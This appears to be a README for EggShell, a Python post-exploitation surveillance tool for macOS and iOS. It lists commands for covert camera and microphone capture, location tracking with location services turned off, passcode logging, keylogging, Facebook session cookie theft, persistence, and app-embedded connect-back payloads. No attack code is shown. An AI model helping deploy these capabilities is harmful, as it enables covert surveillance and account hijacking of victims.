EggShell is an iOS and macOS post exploitation surveillance pentest tool written in Python.
This tool creates 1 line multi stage payloads that give you a command line session with extra functionality. EggShell gives you the power and convenience of uploading/downloading files, taking pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more.
Server communication features end to end encryption with 128 bit AES and the ability to handle multiple clients. This is a proof of concept pentest tool, intended for use on machines you own.
Getting Started
To use EggShell, you must have pycrypto and Python 2.7.x installed
Install using git: (macOS/Linux)
git clone https://github.com/neoneggplant/EggShell
cd EggShell
python eggshell.pyCreate And Run A Payload
Using the menu, we can choose to create a bash payload, this is what will be run on the target machine. It is a 2 stage payload, it will connect to our eggshell server, download a shell script and tell our server what device it is, and then finally connect back one more time to download and execute the binary.
Example: running the created payload on our target
Back on our server, we can see we received a connection and an eggshell session has been started!
macOS Commands
ls : list contents of directory
cd : change directories
rm : delete file
pwd : get current directory
download : download file
picture : take picture through iSight camera
getpid : get process id
openurl : open url through the default browser
idletime : get the amount of time since the keyboard/cursor were touched
getpaste : get pasteboard contents
mic : record microphone
brightness : adjust screen brightness
exec : execute command
persistence : attempts to connect back every 60 seconds
rmpersistence : removes persistence
iOS Commands
sysinfo : get system information
ls : list contents of directory
cd : change directories
rm : delete file
pwd : get current directory
download : download file
frontcam : take picture through front camera
backcam : take picture through back camera
mic : record microphone
getpid : get process id
vibrate : make device vibrate
alert : make alert show up on device
say : make device speak
locate : get device location
respring : respring device
setvol : set mediaplayer volume
getvol : view mediaplayer volume
isplaying : view mediaplayer info
openurl : open url on device
dial : dial number on device
battery : get battery level
listapps : list bundle identifiers
open : open app
persistence : installs LaunchDaemon – tries to connect every 30 seconds
rmpersistence : uninstalls LaunchDaemon
installpro : installs eggshellpro to device
EggShellPro Commands (Cydia Substrate Extension)
lock : simulate lock button press
wake : wake device from sleeping state
home : simulate home button press
doublehome : simulate home button double press
play : plays music
pause : pause music
next : next track
prev : previous track
getpasscode : log successfull passcode attempts
unlock : unlock with passcode
keylog : log keystrokes
keylogclear : clear keylog data
locationservice: turn on or off location services
EggShell Pro
EggShell Pro is a Cydia substrate library that takes advantage of the the system functions in iOS. With this extension, we can perform home button actions, simulate the lock button, toggle location services, and more. Another feature is being able to log the passcode that the iPhone has used to be unlocked with. When interacting with an iOS Device, simply run “installpro” and the dylib file will upload to the device followed by a respring.
Navigating/Downloading Files
EggShell has a command line interface like feel to it. Using the unix like commands built into eggshell, we can print working directory (pwd), directory listing (ls), remove files (rm), and change directories (cd). Using these commands we can easily navigate the file system just like the command line. Using the download command we can download any file securely over our encrypted connection. In the example below, we go through a directory and download a pdf file on the target machine.
Taking Pictures
Taking a photo with the “picture” command on macOS will active the iSight camera and send the image data back to the server. To take a picture on iOS use the “frontcam” or “backcam”
iOS Location Tracking Even With Location Services Off
EggShellPro lets us send commands to toggle location services on or off. This means even if location services are off, we can turn them on, retrieve the location of the device, and then quickly turn location services off.
We get location coordinates of the exact spot the device is currently in and also a convenient link to google maps.
iOS Getting Passcode
EggshellPro hooks into lock screen functions and logs any success the devices passcode in memory. When we run “getpasscode” we are sent back the passcode that was used last to unlock the device.
macOS Hijacking Safari Facebook Sessions
With the command getfacebook, there is a special function in eggshell that parses through binary cookies from safari. Due to safari binary cookies being unencrypted, we can easily leak the Facebook c_user and xs cookies and use it to login on another browser.
macOS Persistence
To achieve persistence, even without being root, the command “persistence” adds the payload to the crontab file. It attempts to re-connect every 60 seconds even after a reboot. To remove persistence, simply enter “rmpersistence” and it should remove itself from crontab.
Recording Audio
Using the “mic record” command, we can asynchronously record audio on both iOS and macOS. This means we can record through the mic while running other commands. When we are finished recording, simply run “mic stop”, this will stop the recording of audio and download the audio data.
Handling Multiple Sessions
With the built in feature “MultiServer”, we can listen for multiple connections. Below is an example with 2 connections on the same device, however this can be done with multiple devices.
As we connect to targets, we can use “sessions” to list all the active sessions, “interact” to interact with a session, “close” session numbers, and “back” to go back to the multiserver console
Payloads In Apps
Payloads can easily be added inside of apps. Below is an example of using the “system()” function to call our payload, still in just one line! This method can be used on both macOS and jailbroken iOS
Immediately after running the app, our payload is run and just as expected, we have a connection
Safari Exploit + EggShell
Soon after iOS security researcher Luca Todesco released his browser based 9.3.3 jailbreak, I reused some of his code to demonstrate taking over a device from safari. Below is Lucas Jackson’s video demonstration featured on EverythingApplePro
Original Video
